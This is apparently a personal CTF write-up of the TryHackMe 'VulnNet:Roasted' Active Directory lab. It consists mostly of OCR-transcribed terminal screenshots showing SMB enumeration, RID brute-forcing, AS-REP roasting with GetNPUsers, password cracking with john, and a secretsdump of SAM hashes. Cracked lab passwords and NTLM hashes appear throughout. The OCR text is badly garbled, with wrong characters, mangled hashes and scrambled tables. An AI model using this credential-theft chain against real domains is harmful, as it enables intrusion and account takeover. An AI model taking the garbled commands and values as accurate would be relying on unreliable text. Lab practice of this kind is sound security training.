tryhackme
View on GitHub
VulnNet:Roasted (WINDOW AD)
19 June 2022 05:24 PM
user found
tj072889*
bNdKVkjv3RR9ht
![—/Down10ads] smbmap -H 10.10.33.13 guest -u [+] IP: 10.10.33.13:445 Name: 10.10.33.13 Disk ADMIN$ c$ IPC$ NETLOGON SYSVOL vulnNet-Business-Anonymous VulnNet-Enterprise-Anonymous permissions NO ACCESS NO ACCESS READ ONLY NO ACCESS NO ACCESS READ ONLY NO ACCESS comment Remote Admin Default share Remote IPC Logon server share Logon server share vulnNet Business Sharing VulnNet Enterprise Sharing](VulnNetRoasted/media/image5.png)
![kaliS kali [—/Down10ads ] smbclient -L 10.10. 126.157 Enter WORKGROUP\kali's password: Sharename ADMIN$ c$ IPC$ NETLOGON SYSVOL Type Disk Disk IPC Disk Disk Comment Remote Admin Default share Remote IPC Logon server share Logon server share vulnNet-Business-Anonymous Disk vulnNet Business Sharing VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing Reconnecting with SMBI for workgroup listing. do_connect: Connection to 10.10.126.157 failed (Error Unable to connect with SMBI no workgroup available](VulnNetRoasted/media/image6.png)
![Try "help" smb: Is H kali@ kali —/Down10ads] smbclient Enter WORKGROUP\ka1i's password: • 40 202 • 40 202 to get a list of possible commands. Business-Manager.txt Business-Sections . txt Business-Tracking. txt A 758 654 471 Fri Fri Thu Thu Thu Mar Mar Mar Mar Mar 12 12 11 11 11 • 46. 21. 21. 20:24:34 20: 24 8771839 blocks of size 4096. 4550147 blocks available smb: more Business-Manager.txt getting file \Business-Manager. txt of size 758 as /tmp/smbmore. BAKFV7 smb: \> smbAC kali@ kali [—/Downtoads] smbmap -H 10.10. 126.157 202 202 202 (0.](VulnNetRoasted/media/image7.png)
![kaliS kali ) - [—/Down10ads] python3 /usr/share/doc/python3-impacket/examples/lookupsid.py anonymousä)1ø.1ø.126.157 Impacket vø.1ø.1.dev1+2022ø606.123812.ac35841f - Copyright 2022 SecureAuth Corporation Password : Brute forcing SIDS at 10.10.126.157 StringBinding ncacn_np:1ø.1ø.126.157[\pipe\lsarpc] Domain SID is: S-1-5-21-1589833671-435344116-4136949213 498 513: 525 : : VULNNET- 500: VULNNET 501 : VULNNET 502: VULNNET 512: VULNNET VULNNET- 514: VULNNET 515: VULNNET 516: VULNNET 517: VULNNET 518: VULNNET- 519: VULNNET 520: VULNNET 521 : VULNNET 522: VULNNET VULNNET 526: VULNNET 527: VULNNET RST\Enterprise Read-only Domain Controllers (SidTypeGroup) -RST\Administrator (SidTypeUser) -RST\Guest (SidTypeUser) -RST\krbtgt (SidTypeuser) -RST\Domain Admins (SidTypeGroup) RST\Domain Users (SidTypeGroup) -RST\Domain Guests (SidTypeGroup) -RST\Domain Computers (SidTypeGroup) -RST\Domain controllers (SidTypeGroup) -RST\Cert Publishers (SidTypeAlias) RST\Schema Admins (SidTypeGroup) -RST\Enterprise Admins (SidTypeGroup) -RST\Group policy Creator Owners (SidTypeGroup) -RST\Read-only Domain controllers (SidTypeGroup) -RST\CIoneabIe Domain Controllers (SidTypeGroup) -RST\Protected Users (SidTypeGroup) -RST\Key Admins (SidTypeGroup) -RST\Enterprise Key Admins (SidTypeGroup)](VulnNetRoasted/media/image8.png)
![kali 9 kali [—/Down10ads] cat vunUse.txt krbtgt a-whitehat t-skid j -goldenhand j-leet](VulnNetRoasted/media/image9.png)
![kali S kali) -C —/Down10ads) python3 /usr/share/doc/python3-impacket/examples/GetNPUsers .py vulnnet-rst.local/ -usersfile vunUse. txt Impacket vø.1ø.1.dev1+20220606.123812.ac35841f - copyright 2022 secureAuth corporation [-] Kerberos sessionError: KDC ERR credentials have been revoked) [-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set -no-pass 10.10.126.157 $krb5asrep$23$t-skidöVULNNET-RST. LOCAL f12ef637d09c717e88f726d39521db1daøee92de 5adcd6fe73f52b094ød7b174bf2fb715eec640øe80b1e9079bø58cb845cbe9718837632561øa5e73ø2743føaf4848eøaab42øa8f1286a336198b41ae76b96a90d7b517368867dc89c bf07a 7bafc5de8aabd81 7b 1 f69bbdøe8d74f2eca86b2f7cfceeae7f03ac6c523dOaf a5162339bbdc7cd1d870455eff9føc696554b4e8761e4øcf812ebc1235176d443c6øe59eb87b54feeefe978a81a16fa87a9a9d4f14c34539f8844ff59466c7765 [-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set [-] user j-leet doesn't have set](VulnNetRoasted/media/image10.png)
![kaliS kali —/Downloads] sudo john --word list=/usr/share/wordlists/rockyou . txt hahs [sudo] password for kali: Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHAI A Will run 4 OpenMP threads press 'q' or Ctrl-C to abort, almost any other key for status ( $krb5asrep$23$t-skidöVULNNET-RST. LOCAL) tj072889* lg DONE (2022-06-19 07:51) ø.2409g/s 765902p/s 765902C/s 765902C/s tj3929 tjø216044 "—show" option to display all of the cracked passwords reliably Use the Session completed.](VulnNetRoasted/media/image11.png)
![kaliS kali [—/Down10ads] smbmap -H t-skid tjØ72889* 10.10.33.13 -u [+] IP: 10.10.33.13:445 Name: vulnnet-rst.local Disk ADMIN$ c$ IPC$ NETLOGON SYSVOL VulnNet-Business-Anonymous VulnNet-Enterprise-Anonymous permissions NO ACCESS NO ACCESS READ READ READ READ READ ONLY ONLY ONLY ONLY ONLY commen t Remote Admin Default share Remote IPC Logon server share Logon server share VulnNet Business Sharing VulnNet Enterprise Sharing](VulnNetRoasted/media/image12.png)
![kaliS kali )- ] smbclient t-skid Enter WORKGROUP\t-skid's password: Try "help" to get a list of possible commands. smb: Is vulnnet-rst. local Dr Thu Mar 11 Thu Mar 11 14: 19:49 Thu Mar 11 14:19:49 4319097 blocks available 8540159 blocks of size 4096. smb: cd vulnnet-rst.local smb: \vulnnet-rst.local\> Is DfsrPrivate Policies scripts DHSr D Thu Thu Thu Thu Tue Mar Mar Mar Mar Mar 11 11 11 11 16 14. 14. 19: • 40 • 40 15. • 49 8540159 blocks of size 4096. smb: cd scripts 4319047 blocks available smb: \vulnnet-rst.local\scripts\> Resetpassword. vbs 8540159 blocks of smb: \vulnnet-rst.local\scripts\> dir D size 4096. 1 0 2821 Tue Mar 16 19: 15: 49 Tue Mar 16 19:15:49 Tue Mar 16 19: 18: 14 2021 2021 2021 2021 2021 2021 2021 2021 2021 2021 2021 4305713 blocks available](VulnNetRoasted/media/image13.png)
![(kali S kali)- [—/Downtoads] $ smbmap -H a-whitehat bNdKVkjv3RR9ht 10.10.33.13 -u -p [+] IP: 10.10.33.13:445 Name: vulnnet-rst.local [ / ] work[!] unable to remove test directory at \\1Ø.1Ø.33.13\SYSVOL\IJVLXGYCDZ, please remove manually Disk ADMIN$ c$ IPC$ NETLOGON SYSVOL vulnNet-Business-Anonymous VulnNet-Enterprise-Anonymous Permissions READ, WRITE READ, WRITE READ ONLY READ, WRITE READ, WRITE READ ONLY READ ONLY Commen t Remote Admin Default share Remote IPC Logon server share Logon server share vulnNet Business Sharing VulnNet Enterprise Sharing](VulnNetRoasted/media/image15.png)
![(kaliS —/Down10ads ] $ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9htö1ø.10.33.1 Impacket vø.1ø.1.dev1+2ø22ø6ø6.123812.ac35841f - Copyright 2022 SecureAuth Corporation [ * ] Service RemoteRegistry is in stopped state Starting service RemoteRegistry Target system bootKey: øxf1øa2788aef5f622149a41b2c745f49a Dumping local SAM hashes Administrator : 500 : aad3b435b51404eeaad3b435b51404ee : c2597747aa5e43022a3a3049a3c3b09d : : : Guest : 501 : aad3b435b51404eeaad3b435b51404ee : 31d6cfeOd16ae931b73c59d7eøc089cø : : : DefaultAccount : 503 : aad3b435b514øoeeaad3b435b51404ee : 31d6cfeød16ae931b 73c59d7eøcø89cø : : : [-] SAM hashes extraction for user WDAGUtilitYAccount failed. The account doesn't have hash information. [ * ] Dumping cached domain logon information (domain/username:hash) Dumping LSA Secrets $MACHINE . ACC VULNNET-RST WIN-280BMIOEIM1](VulnNetRoasted/media/image16.png)
